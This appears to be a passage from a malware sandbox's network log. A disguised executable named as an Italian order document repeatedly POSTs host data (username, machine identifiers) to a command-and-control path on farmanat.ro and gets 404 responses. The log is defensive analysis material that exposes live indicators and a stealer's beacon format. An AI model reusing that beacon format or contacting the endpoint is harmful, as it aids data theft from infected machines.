Nov 25, 2021 10:51:02.675779104 CET	6788	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:02.709252119 CET	6788	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:02.758126020 CET	6788	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.11.20	50181	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:03.197638988 CET	6789	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:03.231167078 CET	6789	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:03.291152954 CET	6790	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.11.20	50182	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:03.728226900 CET	6791	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:03.762459040 CET	6791	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:03.813153028 CET	6791	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.11.20	49870	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:23.726845980 CET	6358	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:23.761006117 CET	6358	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:23.811579943 CET	6358	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.11.20	50183	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:04.168731928 CET	6792	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:04.201977015 CET	6792	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:04.251219988 CET	6792	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.11.20	50184	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:04.679603100 CET	6793	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:04.713089943 CET	6793	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:04.762806892 CET	6794	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.11.20	50185	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:05.197175026 CET	6794	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:05.231309891 CET	6795	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:05.289465904 CET	6795	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.11.20	50186	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:05.722649097 CET	6796	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:05.756973028 CET	6796	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:05.815517902 CET	6796	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.11.20	50187	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:06.242182970 CET	6797	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:06.275868893 CET	6797	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:06.330142975 CET	6798	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.11.20	50188	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:06.737952948 CET	6798	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:06.772093058 CET	6799	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:06.822905064 CET	6799	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.11.20	50189	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:07.173147917 CET	6800	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:07.206540108 CET	6800	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:07.256402016 CET	6800	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.11.20	50190	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:07.681215048 CET	6801	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:07.714797020 CET	6801	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:07.763802052 CET	6802	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.11.20	50191	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:08.197546005 CET	6802	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:08.231771946 CET	6803	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:08.291446924 CET	6803	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.11.20	50192	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:08.699100018 CET	6804	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:08.733371973 CET	6804	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:08.790093899 CET	6804	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.11.20	49871	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:24.413482904 CET	6359	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:24.446990013 CET	6359	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:24.498095989 CET	6360	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.11.20	50193	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:09.171001911 CET	6805	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:09.204565048 CET	6805	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:09.257839918 CET	6806	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.11.20	50194	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:09.689188957 CET	6806	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:09.723226070 CET	6807	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:09.789699078 CET	6807	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.11.20	50195	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:10.157748938 CET	6808	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:10.191306114 CET	6808	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:10.241446972 CET	6808	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
353	192.168.11.20	50196	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:10.674041986 CET	6809	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:10.708216906 CET	6809	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:10.757982969 CET	6810	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
354	192.168.11.20	50197	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:11.173858881 CET	6810	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:11.208249092 CET	6811	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:11.259363890 CET	6811	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
355	192.168.11.20	50198	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:11.656342983 CET	6812	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:11.689915895 CET	6812	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
